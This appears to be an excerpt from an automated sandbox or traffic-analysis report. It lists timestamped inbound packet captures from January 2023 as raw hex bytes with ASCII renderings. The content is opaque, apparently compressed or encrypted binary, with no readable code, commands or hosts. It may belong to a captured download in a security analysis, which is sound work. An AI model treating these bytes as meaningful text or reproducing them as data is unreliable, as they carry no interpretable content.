2023-01-05 12:18:10 UTC	1126	IN	Data Raw: 67 94 ce b4 a7 b3 df 47 4a 05 ab 3d ef 55 1b 60 58 d3 cd 3e 95 dd 9c 9b 5b 14 9b 59 34 e7 1f 96 f3 da 79 6f c8 f6 eb f8 5a 9b 9b 86 9f 9b 1d d6 2d bc 24 79 06 50 fe da 47 15 66 b9 7a 94 14 03 eb 83 17 40 ab 1a 93 44 26 8d da d2 03 0e f0 95 31 7b c1 f6 cf 0d ad 60 66 28 c6 a2 28 5b ce 7c e6 a0 c3 93 97 ae a6 cd a4 6d 73 79 13 59 0b 7e 19 2b 0c de 7b 0b 7f 39 76 65 7a ad 63 28 5e 93 59 c4 a4 a4 14 49 2a 2b 28 80 64 80 65 60 60 48 5c 6a 2f 0c 4f 4a 0a cc 7f 4a 68 23 a5 a4 57 b2 fd b1 b8 04 43 41 14 ac 4e 9b 3b 88 4c e3 b7 d5 21 84 52 53 fd 55 92 35 4d 47 97 45 1e 57 09 b3 c0 22 b2 46 1c 9b 4a c6 44 8a 44 d7 bd a0 78 d6 14 7e 26 a6 6e df 96 67 6e 3a f6 54 6b 29 f5 d4 09 5b fe e4 6c b8 bc 36 be a0 50 d9 d8 29 52 65 e0 73 be f1 8c 8a d3 9e 75 54 78 38 95 da 27 Data Ascii: gGJ=U`X>[Y4yoZ-$yPGfz@D&1{`f(([\|msyY~+{9vezc(^YI*+(de``H\j/OJJh#WCAN;L!RSU5MGEW"FJDDx~&ngn:Tk)[l6P)ResuTx8'
2023-01-05 12:18:10 UTC	1142	IN	Data Raw: 41 b2 e0 76 6a 76 cc d4 20 69 b9 14 83 c7 da 4f fb 67 bd 17 fb 9c ce f4 09 91 5f 3e 29 db c1 3f 81 e6 a8 75 71 7e 40 ba e2 de 1c 65 09 c7 01 39 c6 89 0b 75 16 55 e3 f3 8f 38 c3 15 86 77 2b 6a f6 77 79 ec 06 43 6b 12 92 83 e2 6d a4 0f cb 22 7e c4 28 3e 7e 8e e7 ef 3f 4a 63 5d 57 90 fb 2b 28 ae 44 87 66 f9 52 e6 31 28 f6 e4 4f 3d 4c 5d 4f 0d 4c d9 9c be a7 68 71 42 66 e0 9b e8 47 87 ac 87 32 b4 5c f6 45 05 33 57 5a 5d 3f 6f 5d 3c d0 bd df 55 83 6c 5c 55 69 b5 42 66 66 88 74 7a af a5 6d b7 0e 06 96 80 07 59 0f 9c 67 ab a4 df 04 5a b1 97 44 b6 db 07 c0 36 dd 4d 5f a7 a1 76 4a ec 2b ce 13 46 fb a2 76 68 c9 2c 7a 21 a4 79 6b fd 17 90 47 a2 0e 0f e8 0b 96 d5 cc 43 f9 fb 9b bd f6 9e cb f9 ac ae d7 b1 a2 e1 6b af fb 0d 87 bf 9e ed 2f d7 60 82 bc 6a 29 43 58 ef d0 Data Ascii: Avjv iOg_>)?uq~@e9uU8w+jwyCkm"~(>~?Jc]W+(DfR1(O=L]OLhqBfG2\E3WZ]?o]<Ul\UiBfftzmYgZD6M_vJ+Fvh,z!ykGCk/`j)CX
2023-01-05 12:18:10 UTC	1143	IN	Data Raw: ba 06 c1 1d d8 c7 1d 1b 69 9a 0d 2c a7 fc b4 87 29 9e 23 52 2b 64 ae a8 cc 5b 80 c5 95 d5 16 b5 ef 0b 94 35 95 95 83 77 2f 44 e6 b3 c9 be a6 10 cd 47 f3 9f 7f 9d e3 38 1f b1 8b 40 47 ff a4 fe a4 96 b7 91 f8 3f 3f e9 2a 11 2c b8 a6 32 eb 77 15 18 c4 eb 51 6d 67 e4 6e 26 34 af 53 7e dc 6a 21 c2 ec 60 48 6a 74 3a e5 66 d1 79 c0 f5 11 b0 c7 5d 14 6c 6a 4c 4b 0a d1 6b ff 76 d2 86 0e 9b f2 91 b3 17 b9 9c 37 6d a1 53 d2 a4 20 91 4d bd d3 d5 73 5d 79 ae b2 5b 9f 78 c1 8c 9e a5 a7 cf b2 61 a6 a4 a1 ba 59 ee 9b 23 1c 22 1c 4a 9e da b1 d2 6e 9c 1d 3d 10 9d 93 bf e0 ad b7 da 2e d7 ed 0b 9f bc 22 d3 6a 49 78 bf 14 79 d7 ad 05 22 37 cb 2c 8a 5c 61 70 9e e7 6d 7c ab ac f3 29 84 0e 7c 77 38 fe a2 54 76 e8 44 cb c6 2c 18 e4 42 04 0d 56 a8 06 2f 4d 5a 2a a9 84 e5 a5 9b 6e Data Ascii: i,)#R+d[5w/DG8@G??,2wQmgn&4S~j!`Hjt:fy]ljLKkv7mS Ms]y[xaY#"Jn=."jIxy"7,\apm\|)\|w8TvD,BV/MZn
2023-01-05 12:18:10 UTC	1159	IN	Data Raw: 77 d5 17 f1 fe 0c 5f 96 06 4f 44 5e 28 b1 a2 fd e1 1a f9 6b 66 07 30 97 5f 7f a7 f6 1b 80 6f df 10 8e c2 b0 b0 09 6d 3b e8 2c e3 9f ef 24 95 c4 93 7a 27 35 bc 65 ff e6 34 26 c3 93 ab e8 5f 20 39 2f 6a c0 42 ec c2 29 a5 4c 08 4f 43 4d 9b fd 77 99 28 9a ff 06 fa 21 91 c0 a7 10 a7 9c 99 56 65 f9 23 36 4a 5a 2c 7d 4b 5b 08 21 3c 08 be 97 c0 24 f1 f7 be d0 93 08 7b f9 ee ad 34 14 39 3e 7e a3 9a 9e 93 3d eb bf aa 81 6f 4d 52 ad e4 6c b9 40 21 b5 e1 dd ae 7c 3a 5f 1f 58 07 83 f8 87 d1 1f 00 2a e4 bf f3 3a dd 53 00 26 6d 92 9c f7 1d a4 ff 67 30 07 8e fe 9e ff be 12 b3 94 ce 06 11 b5 11 48 fe 20 21 41 36 d4 48 cc 69 79 6b 6b 8a 24 a6 f0 ed 54 23 78 f4 df e8 aa 94 aa d4 df f0 00 e0 84 c1 ea 45 df 2e 83 78 17 9c d1 4b e9 e7 86 55 f1 cf 41 ea cf 0d 57 1a f0 7f a3 2c Data Ascii: w_OD^(kf0_om;,$z'5e4&_ 9/jB)LOCMw(!Ve#6JZ,}K[!<${49>~=oMRl@!\|:_X*:S&mg0H !A6Hiykk$T#xE.xKUAW,
2023-01-05 12:18:10 UTC	1160	IN	Data Raw: 44 1c 8f 7d 98 fe ce 58 72 63 48 24 ff bb 47 1d ff c6 42 03 a2 be f7 ff af 2c f9 97 4e c0 18 29 66 79 05 82 fa 62 6b 93 14 0f 07 fa d4 f3 67 9c 54 13 25 bf 80 5c bf 83 d7 a8 fb cf 77 87 bf 13 cc 9c fb db 79 2f 42 5a 7d bb 29 3f f4 b3 6d 2d 9e 77 a7 44 59 45 e2 b2 a1 95 b7 d1 93 a7 c4 18 8f 47 c1 cf 54 0f eb 12 7e bb b9 f7 bd f1 7e 0f 8d fb bf 57 ed aa b5 d4 3e 95 48 2a d0 b2 7c 13 d6 5e 73 73 bd 77 48 16 0c 60 a1 60 ef 7e 39 15 90 fb 32 0a ae e6 5e da d1 60 b9 12 d8 41 db e1 79 fa 16 8c 8a f0 da 00 5d 1f 4f 49 77 16 25 25 ce b3 0e 65 60 fa a2 31 6e 77 c7 4b cd 35 95 a8 3b ba 83 a8 41 44 b6 e3 6a ec 3d 5e 33 97 91 4d b1 0f bd b6 56 9d 5e 94 7f 92 47 d9 bf 50 f6 5a 9c c3 30 dc b4 c8 83 10 e4 0a 82 82 84 38 5b b6 e0 7f 8e 91 c1 4f d8 04 ed 9f 3c ad 26 60 d6 Data Ascii: D}XrcH$GB,N)fybkgT%\wy/BZ})?m-wDYEGT~~W>H*\|^sswH``~92^`Ay]OIw%%e`1nwK5;ADj=^3MV^GPZ08[O<&`
2023-01-05 12:18:10 UTC	1176	IN	Data Raw: 28 e1 3b f2 b5 e3 52 2a c4 c4 37 cf 18 6e 99 00 01 79 1a a6 ae af a1 62 d7 ae 5a 3b fe 42 b1 9c 16 8b 40 ee 83 4e 91 14 44 46 10 00 6f 11 01 df 40 45 15 a6 43 9d 49 7b 6d 86 ab 55 21 e5 0e af 39 bf b1 82 90 82 6e 5c 23 24 62 6e 29 4e 8c f0 d5 12 d5 3a 11 87 f5 1b 8e bb ef 00 8e 6b bb 0e 76 b9 64 48 8f d7 d3 28 b3 6e 92 2c dc 9e 3a 44 ad 99 dd e3 ff 42 ac 90 84 e9 87 66 a6 b7 ad e2 b2 1d 04 45 98 a9 56 e7 ef 1b 18 d6 92 4b 36 7d 1f b0 06 6f b7 41 08 5a b1 07 0f 92 8b da 14 af 49 2f 4a 35 64 d8 26 9f 54 a6 dc 03 05 7f 22 d3 49 68 13 6d ab ee 19 c0 ff d2 88 50 ee 6e db fe 0e 86 3b 30 06 47 62 37 27 56 c4 0f a3 8e 8d b1 ad f8 2d e8 31 9d 52 d4 f5 41 8f 5e 0d ee c7 20 7b e4 93 ee 5f 33 e3 68 51 8b 25 be 42 27 ca 8a f6 10 fc c0 96 fd 59 a5 b1 d8 f0 d5 e3 ac 64 Data Ascii: (;R*7nybZ;B@NDFo@ECI{mU!9n\#$bn)N:kvdH(n,:DBfEVK6}oAZI/J5d&T"IhmPn;0Gb7'V-1RA^ {_3hQ%B'Yd
2023-01-05 12:18:10 UTC	1177	IN	Data Raw: 2b 08 51 0c 92 30 95 c8 61 c6 ac b2 7a a8 dd 3a 3f 77 16 75 cd b0 fb ff 24 26 32 57 73 83 b7 80 39 0d 1a da a8 5a 9c ca cc f3 35 1e e3 8a 30 4c 6d 2b 3f 21 f4 cb 53 13 97 2b d2 c3 0e 8b 38 d9 f8 f9 f8 10 03 5f 90 0e d4 83 c5 ab d6 09 f2 c9 2f 83 56 07 a0 40 ce 45 f4 4a a5 a0 52 9b bb df 72 e7 f0 c4 4a d1 65 cc 64 e4 a8 ad 1f 75 04 85 d8 40 af 12 a8 0d 62 82 e2 74 36 0b 10 3f 8e 06 e5 b0 52 95 31 0a 5b 61 13 ed 95 91 19 99 16 3a ad 26 08 4a d8 5a 0c 09 48 96 8f e6 91 2c e3 14 8a 6d fe 4f 1a e6 5e 0a c5 ef cb df ba b1 5d c2 0a 28 92 a2 62 ee 57 10 9c 7a 0e 65 b4 b4 ad a5 bf 7f 5f f4 b8 ed 8e d6 f2 b4 32 5e 43 39 6a a2 e4 2c 21 20 aa 33 d7 8f 04 00 f2 91 ea d7 07 65 63 19 94 17 4a 01 27 04 9d 4b b0 af 3f 5f c9 d2 fe be 70 1b 88 51 ec 90 cf 91 4e 71 59 76 e7 Data Ascii: +Q0az:?wu$&2Ws9Z50Lm+?!S+8_/V@EJRrJedu@bt6?R1[a:&JZH,mO^](bWze_2^C9j,! 3ecJ'K?_pQNqYv
2023-01-05 12:18:10 UTC	1193	IN	Data Raw: aa 2e ac b7 08 91 e1 5c 03 23 32 aa d1 e1 ea bf 50 e7 c4 0f 38 59 b4 46 a7 17 7c c2 5e 58 5b 13 43 03 be 66 cc 04 c9 19 60 90 a9 47 60 c3 8a 92 83 62 d5 c3 9d 14 0c ac e2 ff 30 48 de 5e 4b fa a4 d3 aa 62 9a 15 88 31 e1 67 91 95 26 50 d2 a6 93 cd f3 1c 35 4a c9 50 51 0b fd 57 f0 d1 09 77 90 1c a8 0b 4c fe c4 05 95 6e e6 e0 58 6c ec 39 26 41 8b 15 5f 14 89 10 d0 0d 9e c0 15 8a 0e 22 aa c6 81 12 a4 34 22 3c 84 36 01 ac 2a 85 d4 e3 83 f3 3a 0e 2c 34 b5 60 b6 19 49 68 02 78 72 75 37 74 19 a3 bb ab d4 e7 f5 be ff 23 ec 32 91 65 4e 7a 64 7d 4d 4b 45 eb 8b a8 21 cb 26 de 49 b2 f1 f5 12 fc 41 22 8a c0 32 ba e7 f0 87 21 ae c0 fb 81 3e 6e 30 c4 d3 81 8c 09 6e 39 03 21 51 e1 db 00 c9 b1 e8 31 6f b5 34 7a e7 d2 2d ef 08 e2 cf 38 31 18 30 f4 95 08 ca 17 6c 35 32 6c c3 Data Ascii: .\#2P8YF\|^X[Cf`G`b0H^Kb1g&P5JPQWwLnXl9&A_"4"<6*:,4`Ihxru7t#2eNzd}MKE!&IA"2!>n0n9!Q1o4z-810l52l
2023-01-05 12:18:10 UTC	1194	IN	Data Raw: 6e ec 86 19 ff b7 57 c8 e4 4b 03 da 5c 69 40 a4 91 3a 93 b1 97 3a be 6a 0b 69 e1 76 7c 02 04 7e 24 10 5e 12 66 1c 99 2f f1 4a 2a a2 bb b1 84 28 0d 1c e5 c4 a3 3d 18 dd ff 94 ca 57 90 9e 88 bc 6e 40 c4 94 41 22 95 eb d5 aa 51 ca 68 fa 94 98 81 13 56 44 eb ea 65 44 b5 08 98 85 22 b0 4a c5 45 1a 5b 4b 77 f1 6b 60 68 0b e4 05 af 27 ba e0 4e cc 52 30 26 c5 1d bf 3d b8 e1 42 9f 29 82 19 0b 18 18 35 0b 33 24 55 12 0e 4a 47 75 37 22 56 52 a7 53 c8 75 a6 e9 d4 be 11 94 19 52 29 b2 c7 0b 84 d2 9e 6a fc e6 5c 3d bd 32 bb c1 43 70 0f b4 0e 2d 23 da 8b e2 55 d9 93 04 b6 5a 0a 9b c8 2a b4 40 27 ed f2 42 d2 65 a3 86 47 71 53 60 0e 04 46 4b a4 e3 e7 29 48 40 12 f6 16 52 99 0c a1 86 8f 45 45 f8 16 14 68 ac db 27 30 c5 8f a6 95 07 ed a1 e3 06 e8 37 05 8c 98 b6 f7 b4 ff d0 Data Ascii: nWK\i@::jiv\|~$^f/J(=Wn@A"QhVDeD"JE[Kwk`h'NR0&=B)53$UJGu7"VRSuR)j\=2Cp-#UZ@'BeGqS`FK)H@REEh'07
2023-01-05 12:18:10 UTC	1210	IN	Data Raw: 36 ab 9f c7 05 10 4b 80 8e 4d f1 1e 71 2d 6a 18 c7 c7 67 75 c5 80 7f b3 b4 ed c6 5f 91 7f 22 dd 17 f6 2c 39 db 1e 11 61 6d 87 75 df 9b 43 f1 c2 12 be 5c a2 0d 8c 17 22 9c 8a cb f9 ea ed e2 6e 89 14 0a 69 23 8a b4 b1 ad 95 fb 36 0b 60 ef 96 93 d8 6a 51 69 02 16 ff 70 ef 9e 16 fe 59 fc a3 c0 9e 2c 05 c6 f6 79 f6 de 0d 53 86 d8 e1 a1 f5 9e 98 f0 7b 25 52 6f 96 e9 b4 0d 0e 1d 52 7d 1d 8d 58 30 f0 22 50 b4 b4 9f 5b 92 69 fb 33 d3 57 51 e4 91 64 45 9a 52 6f 81 47 b9 d4 91 8e d4 24 28 c9 c0 f4 a8 d0 ba 4b 9d 82 c2 fd cb ae 50 20 16 02 d1 14 60 10 62 c0 83 fb 83 a3 19 44 5d 8f 3a ec aa 21 10 a7 39 03 66 24 7f 11 49 5b 22 a0 a9 61 eb c1 13 ec db 95 87 b0 65 7d d4 f4 a6 8e 37 a9 a1 c4 c5 45 f6 5a 80 ab 36 24 84 1b 11 b6 59 35 0c 41 d0 04 ec 85 e7 7f 9a 5b dd 96 ff Data Ascii: 6KMq-jgu_",9amuC\"ni#6`jQipY,yS{%RoR}X0"P[i3WQdERoG$(KP `bD]:!9f$I["ae}7EZ6$Y5A[
2023-01-05 12:18:10 UTC	1211	IN	Data Raw: d5 9c 61 e7 75 49 e2 43 e7 38 7b 02 2f 4e 16 67 ff ce b2 e0 f5 0f ff ad 2a 2e 5e bf dc e1 af c3 e4 4b 1c 3e be 26 9d 4e c4 74 38 36 42 ae 73 35 86 4a 08 d4 6e 85 69 5c e9 79 ee 56 4a 22 f7 40 14 e9 52 fa fa 40 18 0a a3 9a 5a 1a 82 da f5 fb 2b f0 39 4f b3 12 89 53 00 a8 34 61 6f 99 0d ac 31 de ac e0 d4 93 90 aa ae 94 7b 43 f7 2a 86 76 c7 e0 e3 53 8a 44 6a 74 68 ab 39 de 2b 1e 5b ff 18 ec ac 9e f4 a2 db ea 2e 35 21 76 29 c7 1d 50 c3 d1 3b 88 7e 29 4b 0b 2a f0 83 de 3d 8e 3f 6e a1 48 8b 83 ad 4b 7b a3 c8 27 0e 17 16 c2 d9 18 99 3d 64 4b 6a 24 47 ca 52 87 a9 0f c8 ae bb 38 e0 e4 f3 e8 74 6b 6a fe 9d 15 5a c9 17 3e 32 d6 7c bb 3a 3b 8e 3a 85 a2 fd eb af c6 58 b3 a4 2a c2 6e 02 7a f2 0f eb 02 fb e8 29 1c b0 43 0e 13 8a 16 5a 90 03 a7 46 cd bf 48 e0 c2 47 65 de Data Ascii: auIC8{/Ng.^K>&Nt86Bs5Jni\yVJ"@R@Z+9OS4ao1{CvSDjth9+[.5!v)P;~)K=?nHK{'=dKj$GR8tkjZ>2\|:;:Xnz)CZFHGe
2023-01-05 12:18:10 UTC	1227	IN	Data Raw: 9e 09 f2 22 0a be df de 05 cb 4f c3 a7 4b 18 22 85 9c f6 80 44 31 6e 04 2e fe 97 31 31 90 e4 0d 96 f1 1e 8b fa 57 3d 28 23 74 20 dc 0b a8 08 62 87 c7 eb 1f 30 06 ac c7 5a 2a ba 3c 55 5d 12 91 52 ea 85 bd 65 67 c8 25 e9 22 6a 22 ed 65 87 b7 62 de a4 42 8f cd 2f 2f 07 5e 26 2d 97 b7 07 c1 00 73 e2 03 2f c9 1a 56 14 16 18 e4 2a 18 c9 7f 4d f9 cf 9c c9 19 0e 22 61 2a 26 84 1a 78 49 0d d6 06 fb 0b b4 a1 21 af a2 b6 6e cc 8f 6e 41 79 66 dc 53 45 19 8a f5 a8 30 bb 3d 7d f7 ff 06 8b e0 a1 9c cb cf 05 8b 33 28 85 c0 5d c6 0b 1f 64 43 40 9c 4c c3 ac 1d 6b ad 0b 01 ff f2 a5 6e 70 e8 fe 8b d6 c1 c7 38 c8 9c 45 fd 28 32 1a 28 1f 60 12 67 e8 94 f3 1e 05 c5 21 d6 4a 14 57 fd 29 44 05 db 44 50 b2 2f e4 1d 94 b2 1c 2e db f0 f6 d0 80 0f 37 1a d0 98 b5 f7 19 8a d6 37 1e 02 Data Ascii: "OK"D1n.11W=(#t b0Z<U]Reg%"j"ebB//^&-s/VM"a*&xI!nnAyfSE0=}3(]dC@Lknp8E(2(`g!JW)DDP/.77
2023-01-05 12:18:10 UTC	1228	IN	Data Raw: 9e c0 c7 9d 05 2a 76 31 0a 00 03 3d 3d b3 27 13 58 5f d5 28 fc 31 71 c1 1e 8e b4 0a 01 8d 9d 0a 94 41 24 ed 29 48 eb 1e aa ac 57 b7 51 1c e7 0a a0 d9 cd 8b 2e ad 0a 33 21 22 db ed d8 ad c0 db e6 48 56 87 bf b4 91 fc 04 cb 10 f6 f7 60 fe e2 cb 72 6a d5 59 1e 91 48 68 74 43 c4 a5 60 62 7b 50 03 98 d0 af 42 07 3d 86 dd 0b 9b 65 ac cb 1f 28 39 e1 50 7c a5 a1 cc 6b 4b 62 dc 02 3c cf ab d1 d9 3b 30 61 bc f4 a0 e5 66 6c 90 be b7 76 a6 55 45 bb af 57 4f 9c df 18 6b 6a c3 83 5a 53 59 16 d8 7d ad c9 c6 51 80 11 57 35 f2 72 b6 0c 44 64 4e b4 45 43 61 fc 1e 21 42 c2 f9 1a e8 06 6a 7a 37 90 a4 a0 b8 e4 97 9f d5 91 3c 96 00 41 0a 7e 67 f5 69 28 d0 8d 49 79 db 37 79 fd 08 7f f4 8d 06 6c 6b 93 4c c4 c4 b3 a9 d4 fb 93 02 dd 86 91 30 0a a7 16 10 bb dc 85 ac eb 30 d6 d9 70 Data Ascii: *v1=='X_(1qA$)HWQ.3!"HV`rjYHhtC`b{PB=e(9P\|kKb<;0aflvUEWOkjZSY}QW5rDdNECa!Bjz7<A~gi(Iy7ylkL00p
2023-01-05 12:18:10 UTC	1244	IN	Data Raw: 0a 70 bc 48 1a b4 5d 67 17 29 d6 c7 24 7d d7 df 16 81 83 66 0a ec f1 4d 30 20 f2 d6 4e c4 c8 28 1a 69 e9 66 e2 71 33 74 0a 6f a2 25 3f 77 4f d2 f1 be f8 7b fe 78 85 35 ea 1e ec 94 b6 2f d1 c0 12 0a e7 dd 39 24 96 15 31 6e c6 e4 24 d3 4c 14 10 8f 81 81 c1 45 6e c5 05 99 85 37 94 1a ea 0c d5 d9 fc 19 84 ef 79 fa a5 d8 ed c9 0c 4b 15 43 e2 65 54 c2 2f f8 b3 8f 8c e5 2e 96 c1 d0 af ba 13 f0 f6 0e b2 e3 64 5f 99 6a b7 20 32 13 e7 61 23 92 76 b1 8b b7 b4 b1 f0 5c fa 48 0e b7 f6 f5 b1 47 76 59 e7 bc 30 ac bd de 5c 71 89 05 78 86 55 dc e3 8b 6b e9 1c e9 7e 48 2d 31 df f1 23 1b a0 07 4a d4 b9 c0 f3 a2 07 1c b1 f1 89 96 a9 83 a6 83 40 c7 96 36 ef 43 2e 1f ba c4 8d 7d a2 f9 bd ae 14 a2 c4 09 a7 58 b8 b4 d2 b6 8c f7 85 69 72 a4 a6 c5 ac 2d b6 5e f1 2c ba 28 01 7f 70 Data Ascii: pH]g)$}fM0 N(ifq3to%?wO{x5/9$1n$LEn7yKCeT/.d_j 2a#v\HGvY0\qxUk~H-1#J@6C.}Xir-^,(p
2023-01-05 12:18:10 UTC	1245	IN	Data Raw: c4 00 4a 68 de 3d e6 50 05 dd a8 ab 5b 8a 14 e8 6f 12 a8 21 44 c4 fa a4 12 02 18 18 f1 28 f1 1c f8 52 00 ce 6f d9 6b 48 bd fa cc 9c 67 21 50 cd d7 cb 66 1c fa 00 a2 05 fd 42 6f 73 bb 82 f4 b1 6d 22 90 91 4e de 07 43 38 f6 e9 4f 62 8c 91 32 98 69 05 00 f1 49 0c c2 cb 6c 00 48 80 fb 76 35 39 20 30 ba b1 3b f7 bc ef 23 b5 3e a0 2d 7c 1d 53 61 6c 0d 61 8e df 51 0d 70 d9 07 0e c3 bf f0 92 4d 3f 8d a6 84 4b e7 38 c4 de 6d c6 ea ab 6b bf dd df 6f bf 18 87 6c 3a c4 72 66 94 a3 cc fc 27 a4 10 95 17 de 3d 70 51 54 af 04 1a ba d9 45 de 54 3d 7a d4 09 e6 6e b6 68 4d 00 13 88 ef cb d3 23 eb 0b 27 e8 62 48 2d 55 b1 d3 b8 8d 1e 6e 9d cf f5 2b 91 6f c1 f0 57 79 8c 17 51 5c 30 08 f5 00 69 6f 85 ce 3b 35 7a 8c 12 45 5c 6b 6a 98 11 2e f2 70 44 3a 97 7b 44 ce 95 64 bd 69 3f Data Ascii: Jh=P[o!D(RokHg!PfBosm"NC8Ob2iIlHv59 0;#>-\|SalaQpM?K8mkol:rf'=pQTET=znhM#'bH-Un+oWyQ\0io;5zE\kj.pD:{Ddi?
2023-01-05 12:18:10 UTC	1261	IN	Data Raw: 80 6d 40 df 0d 74 7a f2 ea 47 bf ee 7c 64 2a 5d c7 91 a2 63 a2 9a c3 93 38 30 c0 52 2d 8c e0 2e a2 ce aa 46 14 6a d0 af 7d 82 9a 4e a7 44 3f 7e a2 37 05 8d 30 29 cb ef 21 73 e3 1f 60 04 8b b8 36 46 fd d1 1a ff 89 18 2d 76 26 e6 59 23 36 cb 21 06 eb 76 44 a9 95 05 a0 10 32 a5 70 51 fd 06 90 92 fc cc 63 40 1b b7 88 86 ee 4f 69 86 bc 66 48 4d 69 e6 64 41 6f 9d 20 fb 49 c1 ff 6b ca ee 6a a8 ea 8c 82 ac e4 61 89 c0 69 98 6a d7 db ed c2 48 d7 8d 04 c6 65 fd 0c 41 20 e5 eb 34 7e 88 4f 48 9c c2 1a ae ae bb 9c 78 c1 11 53 ec 67 43 ba 8c 9a 03 fa 0c a6 cf a5 eb 15 e6 92 bc 51 1d 7c 6e 66 55 30 60 d7 c8 b2 7a c5 e0 ad 14 f3 be 95 aa df 5a e2 5a 29 48 0a d3 4c 9c 81 77 df b6 24 00 e9 b8 55 b8 93 e8 43 ac 2a d5 aa 1b 83 d3 71 d3 f0 cf be a1 f7 39 d4 2d 3c 59 c4 62 db Data Ascii: m@tzG\|d]c80R-.Fj}ND?~70)!s`6F-v&Y#6!vD2pQc@OifHMidAo IkjaijHeA 4~OHxSgCQ\|nfU0`zZZ)HLw$UCq9-<Yb
2023-01-05 12:18:10 UTC	1262	IN	Data Raw: 91 e3 16 82 cb ba 29 00 14 f3 1e 69 81 25 25 3d 62 f6 8f 61 de 6a 8d a8 8d 5a e6 98 ee ed a2 b8 e9 d7 93 53 c5 64 c9 79 70 43 77 35 89 75 a6 a2 26 19 32 c1 20 6a c8 75 97 0e 5e c6 8d 1c 7c c0 21 0c 62 e0 d0 ae c4 a3 0b 32 68 cd 1b 81 1e 05 49 5a c6 87 7e 22 00 0d 23 92 1c 00 fb 5e f8 91 7e a3 2e c5 9a 9b 7c 32 10 72 e0 4e 45 54 e3 43 42 8a 52 63 c7 77 5e 5a 90 04 54 d3 ae b1 e8 c0 d7 60 06 0e e3 f3 37 50 22 2b e5 fb 83 65 c7 25 93 1b 9c 58 d3 e6 98 06 91 fb 42 51 23 0f 85 12 b5 0c 76 4d 11 70 c7 23 5a 01 4c 42 71 c4 af 72 00 61 d9 ec a1 c3 e4 08 bc 9e 71 26 4e 2b 44 d0 c8 7c 1b 92 a4 b5 8b 13 56 a4 1d f3 57 da eb 86 56 2f f2 11 98 7d 33 79 ba 28 1a 2c b9 f9 41 a4 44 1c 29 10 a4 be d7 f4 07 61 44 92 d5 c2 ee f3 08 35 93 e7 20 f8 e3 2c 29 e0 24 51 99 df 95 Data Ascii: )i%%=bajZSdypCw5u&2 ju^\|!b2hIZ~"#^~.\|2rNETCBRcw^ZT`7P"+e%XBQ#vMp#ZLBqraq&N+D\|VWV/}3y(,AD)aD5 ,)$Q
2023-01-05 12:18:10 UTC	1278	IN	Data Raw: 22 10 e0 86 fb 09 8f aa 2c bc 9d 17 ab 00 37 76 c9 cd 7f 63 fa d5 0b 40 4a 02 91 5f e0 84 41 2f 12 63 86 46 26 de 27 eb 6f d0 b0 fb 30 fe 08 48 00 2d e9 e6 47 b2 cb b7 b3 af d3 ff f9 b5 4f f4 10 40 7b 3c aa b8 60 ba 75 0c 64 af 41 89 04 1f b3 7e 4f 68 72 90 3f c0 04 74 0c f1 03 21 7e 8f 71 24 ca 10 c0 4d 74 5f 14 0d 3d 9b 42 02 af 97 48 95 4a e8 48 36 07 3f 0f 12 a7 98 20 e2 3a 9b 77 9a 06 1f 12 38 1a 87 22 01 94 8f 10 e0 cd 6d 3d 01 54 64 96 19 89 98 97 2a 09 e7 18 77 cd c9 79 38 3c c2 ec 3e 49 a3 3c 53 7a 4a e4 46 20 12 d2 3f 88 1d 67 ac 3f 39 24 64 34 c1 4b 86 92 c8 4d a0 96 c1 be 84 84 37 ad 9b 95 15 4c 34 db cb a5 88 98 1d c8 28 10 41 25 81 43 9e cb 8d 0f 85 e0 cb 7d 26 f4 4b 01 5b 36 38 72 06 ce 5e 2b a0 46 88 0c 13 d5 19 48 c4 5f 52 0c 94 52 38 ce Data Ascii: ",7vc@J_A/cF&'o0H-GO@{<`udA~Ohr?t!~q$Mt_=BHJH6? :w8"m=Td*wy8<>I<SzJF ?g?9$d4KM7L4(A%C}&K[68r^+FH_RR8
2023-01-05 12:18:10 UTC	1279	IN	Data Raw: de 98 7f be 35 b4 ec 0e 02 3b 1e 47 74 a1 ff 22 6b a3 04 7b 2c c8 0c 11 81 a5 3f a3 cd 9b 76 31 d7 ee db f9 8b 60 a0 50 05 60 e5 8b ed c8 dc a4 99 f5 d4 76 10 0e 18 29 06 e8 01 cd fe 09 a2 79 d5 e3 e5 78 90 f4 a4 be 2c 10 3f 8c 77 70 e6 06 83 30 67 fd 0f 83 71 49 b4 15 1c 6a e9 ca 66 64 07 aa 46 d1 42 eb c7 80 45 62 62 65 b9 a4 4f 50 ec 92 d9 7f a1 e3 87 0d 91 64 66 9e 6f 43 b0 02 bf ae 98 98 4a da a3 0d c8 b9 e0 06 e0 83 b7 99 23 ee 75 44 a7 ad 8a 1c 69 a6 a6 16 99 01 3f 98 7d 2c ee 78 8f 45 c3 f5 a7 ad 03 b5 7c 7e f2 a3 fe 0c ce 73 f0 06 f5 2a 43 45 06 7e 25 0b 7f c8 35 f7 f6 0b ec 3a 47 7e 42 97 73 c7 42 c6 d7 e9 40 30 ce 0b 1d 09 cd f7 62 03 0a 01 ee 4b c4 90 97 b4 13 bf c7 4d ee b7 e2 86 a7 1e 78 30 45 6b 31 47 70 a8 55 f8 8c 4d 9d 7a 00 82 be a3 ca Data Ascii: 5;Gt"k{,?v1`P`v)yx,?wp0gqIjfdFBEbbeOPdfoCJ#uDi?},xE\|~s*CE~%5:G~BsB@0bKMx0Ek1GpUMz
2023-01-05 12:18:10 UTC	1295	IN	Data Raw: 1d 2e 42 3a 4e f4 db 52 62 aa a1 66 6d ba 46 a4 3e 6e 41 44 89 f5 86 05 59 fb c6 31 93 4e 55 2b 1c b0 5e a5 89 b9 5b f8 7a 7c 34 23 a8 17 a5 e6 fd c6 e8 47 b7 c0 bb 68 38 f7 8b c2 6c d8 3f 1b 94 86 d5 ff 89 7a fb 70 62 1a 6b 8f 84 59 f8 4d f8 f7 4d 0f 80 c5 9a 79 85 5b 16 48 4f 23 02 00 1f e2 72 62 12 51 1c 3d 39 53 1d 28 cf ea 7a 15 f8 97 c6 7a 3b c7 4e 49 c5 00 d6 45 0c c9 4c 0c 09 86 25 05 33 a2 4e cc df 56 b5 b3 a9 2e 09 0a 53 be 54 1d 5d 98 d2 21 04 c0 a1 3c c9 a1 8c 73 ad 81 45 38 93 27 39 a0 0e d2 19 46 7b b6 a5 d1 7e ce 64 3f d8 60 27 63 c9 d6 b3 1a 7e 84 b5 a2 54 b4 03 37 d7 c6 20 02 aa 99 59 8e 12 7b 7b 84 80 ba b2 8b 09 d4 07 f7 c3 e2 17 2f 8f ee 71 6c c1 87 86 31 4d d9 23 cb a3 d6 85 a0 ec ef 9d 9e ea ec 4a f0 55 51 d3 e3 bb 24 43 27 4d 59 06 Data Ascii: 